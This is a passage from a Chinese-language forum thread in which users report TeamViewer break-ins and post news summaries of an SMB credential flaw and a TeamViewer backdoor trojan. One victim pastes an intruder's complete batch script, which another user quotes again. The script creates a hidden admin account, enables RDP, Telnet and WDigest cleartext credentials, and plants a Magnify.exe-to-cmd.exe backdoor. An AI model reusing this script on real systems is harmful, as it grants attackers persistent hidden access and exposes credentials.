可是我比較納悶的是.....

我兩台電腦都被登入,但實在看不出來他到底做了什麼,

只有一台曾經用瀏覽器打開過paypal網頁,但由於我沒帳號,他也就放在那了

但隔天他還是有試圖登入我的電腦,害我現在整個毛毛的

雖然已經把TV砍了改用Chrome,而且電腦也設定五分鐘後自動上鎖

但實在很怕他幫我植入了什麼鬼東西,用nod32是沒掃出什麼東西

所以結論是...我被高高舉起輕輕放下嗎<囧"

lisa_tsai_2004

36分

75樓

lisa_tsai_2004

個人積分：36分

文章編號：60383308

我前天凌晨也遇到了
遊戲中突然跳回桌面，鼠標一直亂跑不受控制
TV主畫面跳出顯示有人與我連線
我一直干擾它，把連線關閉後
駭客又連到我的VM虛擬電腦(有裝TV，系統常駐)
開啟paypal網頁，我立刻關閉連線阻止它

版本11.0.53254 官網安裝版
有註冊免費帳號，TV平時系統常駐待機
系統隨機密碼4位數+自訂密碼6位數

我不知道駭客是怎麼連入的? 暴力破解或亂猜?
1.E-mail註冊帳密(此密碼跟我信箱使用的密碼不同) 2.系統ID(一組數字+4位數隨機密碼) 3.自訂個人密碼(6個數字，很好猜)
我的親友群也沒人在用這軟體，肯定是駭客

Clover UEFI 原版黑蘋果！

341分

76樓

Clover UEFI 原版黑蘋果！

個人積分：341分

文章編號：60384139

lisa_tsai_2004 wrote:
我前天凌晨也遇到了...(恕刪)

有漏洞

Chernsha

125分

77樓

Chernsha

個人積分：125分

文章編號：60391478

tedjackyx wrote:
有安裝TeamViewer...(恕刪)

請參考以下資訊:
可能是有以下漏洞，請自行作好防範:

第一種可能:
近日，Hacker News發表了一篇文章，聲稱安全研究人員發現了一個存在于所有Windows版本的漏洞。攻擊者可以利用該漏洞從裝有任何版本Windows操作系統（包括尚未發布的Windows 10）的計算機、平板或服務器上竊取用戶的認證信息。
該漏洞被稱爲“服務器信息塊（Redirect to SMB）重定向”,這是研究人員Aaron Spangler在大約18年前發現的一個漏洞的變種。按照發現該漏洞的安全公司Cylance的說法，Windows的這個缺陷從未被修複，因爲微軟覺得這個漏洞不值得關注。這導致攻擊者可以利用SMB文件共享協議完成攻擊。
SMB是Server Message Block的縮寫，這是一種允許用戶在網上共享文件的協議。當用戶從服務器請求一個文件時，Windows會自動提供用戶的認證信息給SMB服務器進行身份驗證。攻擊者可以通過任意方法（比如，中間人攻擊）截獲該HTTP請求，然後重定向到一個由攻擊者控制的SMB服務器。Cylance聲稱，攻擊者在獲取了用戶系統的用戶名、域及散列密碼後，不用半天時間就可以破解。
不過，微軟仍然認爲這個漏洞不嚴重。微軟一位發言人表示：
我們不同意Cylance宣稱的新攻擊類型這種說法。
要實現這種類型的網絡攻擊需要具備其它幾個條件，比如成功誘導客戶在一個虛假網站上輸入信息。
以下是Cylance提供的一個易受SMB漏洞攻擊的程序列表：
許多廣泛使用的應用程序：Adobe Reader、Apple QuickTime及處理iTunes升級的蘋果軟件更新；
微軟應用程序：IE、Windows多媒體播放器、Excel 2010及微軟基線安全分析器；
開發工具：Github for Windows、PyCharm、IntelliJ IDEA、PHP Storm 和JDK 8u31安裝包；
安全工具：.NET Reflector和Maltego CE；
反病毒軟件：諾頓安全掃描、AVC Free、BitDefender Free和Comodo Antivirus；
團隊工具：Box Sync和TeamViewer。
用戶可以從以下幾個方面保護自己免受攻擊：
最簡單的方法是關閉139和445端口；
應用供應商提供的最新軟件更新；
使用強密碼。

第二種可能:
BackDoor.TeamViewer.49是俄羅斯安全廠商Dr.Web發現的一個後門木馬。Dr.Web指出，該木馬會將TeamViewer應用程序安裝到受感染計算機中，因此會將網絡流量從犯罪分子手中中繼到互聯網其它服務器中，將該主機作爲代理服務器。

Dr.Web和Yandex安全企業的研究員在5月初發現了該木馬通過一個複雜的多階段機制進行傳播。

用戶並非直接就受到該木馬的攻擊，而是首先經過一個名爲Trojan.MulDrop6.39120的惡意軟件釋放器被感染。Dr.Web表示後者跟一個Adobe Flash播放器的更新包一起在網絡上傳播。當用戶安裝了該惡意Flash播放器更新之後會得到一個合法的Flash版本，但同時也會得到 Trojan.MulDrop6木馬，後者會偷偷將TeamViewer安裝到受害者電腦上。

這種方法並不少見，但犯罪分子並沒有將其用于等于受害者電腦並控制設備，而是用于其他目的。

犯罪分子將TeamViewer的avicap32.dll文件用包含BackDoor.TeamViewer木馬的惡意版本替代。由于 TeamViewer會自動在OS內存中運行avicap32.dll，因此犯罪分子只需要將自動運行功能添加到TeamViewer中並確保該app的圖標隱藏于Windows通知區域之外就可。

做出所有必要的修改且TeamViewer運行之後，BackDoor.TeamViewer就會通過一個加密信道連接到犯罪分子命令和控制服務武器上等待指令。Dr.Web指出，在所分析的版本中，木馬的主要功能是作爲網絡代理器運行，拿走從命令和控制服務器中接收到的流量，並且將其中繼到互聯網，從而隱藏犯罪分子的真實IP地址。

安全研究人員表示，真正的問題在于安裝惡意軟件程序。一旦系統被感染，犯罪分子實際上就能夠利用這個特殊的系統爲所欲爲。根據惡意軟件的複雜程度他，它能夠捕獲整個系統、抓取或控制信息等等。因此最重要的事情是，用戶應該利用正確的反惡意軟件方法盡量保護系統的安全。

raywang310

0分

78樓

raywang310

個人積分：0分

文章編號：61634450

今天teamviewer也被連入了.....
對方傳了一個.bat檔到我的電腦裡
有人知道他對我的電腦做了什麼嗎?

以下是.bat檔內容
:secacc
cd %windir%\system32
net user Administrator rozensysmaiden /ad
net user Administrator rozensysmaiden
net user Administrator /act
net localgroup Administrators Administrator /ad
attrib +s +h C:\Users\Administrator
attrib +s +h C:\Users\pptp
attrib +s +h C:\Users\pptp$
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Administrator /t reg_dword /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v pptp$ /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermDD" /v start /t reg_dword /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService" /v start /t reg_dword /d 2 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr" /v start /t reg_dword /d 2 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f
netsh advfirewall firewall add rule name="Internet Explorers" dir=in action=allow
net start TermService
takeown /F Magnify.exe
icacls Magnify.exe /grant administrators:f
icacls Magnify.exe /grant system:f
ren Magnify.exe Magnify1.exe
copy cmd.exe Magnify.exe
takeown /F termsrv.dll
icacls termsrv.dll /grant administrators:f
icacls termsrv.dll /grant system:f
cd %systemdrive%\Users
dir /b /on > desktop.txt
%systemdrive%
cd %systemdrive%\Users
@for /f %%i in (desktop.txt) do cd \users\%%i\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\&del *.lnk
cd %systemdrive%\Users
del desktop.txt
WMIC USERACCOUNT WHERE "Name='Administrator'" SET PasswordExpires=FALSE
:start pkgmgr /iu:"TelnetServer"
:start pkgmgr /iu:"TelnetClient"

tedjackyx

1968分

樓主

tedjackyx

個人積分：1968分

文章編號：61637769

raywang310 wrote:
今天teamviewer...

:secacc
cd %windir%\system32
net user Administrator rozensysmaiden /ad
net user Administrator rozensysmaiden
net user Administrator /act
net localgroup Administrators Administrator /ad
attrib +s +h C:\Users\Administrator
attrib +s +h C:\Users\pptp
attrib +s +h C:\Users\pptp$
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Administrator /t reg_dword /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v pptp$ /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t reg_dword /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermDD" /v start /t reg_dword /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService" /v start /t reg_dword /d 2 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr" /v start /t reg_dword /d 2 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f
netsh advfirewall firewall add rule name="Internet Explorers" dir=in action=allow
net start TermService
takeown /F Magnify.exe
icacls Magnify.exe /grant administrators:f
icacls Magnify.exe /grant system:f
ren Magnify.exe Magnify1.exe
copy cmd.exe Magnify.exe
takeown /F termsrv.dll
icacls termsrv.dll /grant administrators:f
icacls termsrv.dll /grant system:f
cd %systemdrive%\Users
dir /b /on > desktop.txt
%systemdrive%
cd %systemdrive%\Users
@for /f %%i in (desktop.txt) do cd \users\%%i\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\&del *.lnk
cd %systemdrive%\Users
del desktop.txt
WMIC USERACCOUNT WHERE "Name='Administrator'" SET PasswordExpires=FALSE
:start pkgmgr /iu:"TelnetServer"
:start pkgmgr /iu:"TelnetClient"

(恕刪)

猜猜看：
可能是透過"最高權限使用者"修改"登入檔"
找被*號的密碼。
再到IE解除防火牆

簡單來講，應該是要偷密碼吧?

sasamisami

4043分

80樓

sasamisami

個人積分：4043分

文章編號：65491324

時隔一年
TeamViewer漏洞補了沒?
Chrome 遠端桌面有時會連不上

[注意] TeamViewer 被入侵

小惡魔新聞台

小惡魔廣編特輯

[注意] TeamViewer 被入侵

小惡魔新聞台

小惡魔廣編特輯

今日熱門文章 網友點擊推薦！

今日熱門文章　網友點擊推薦！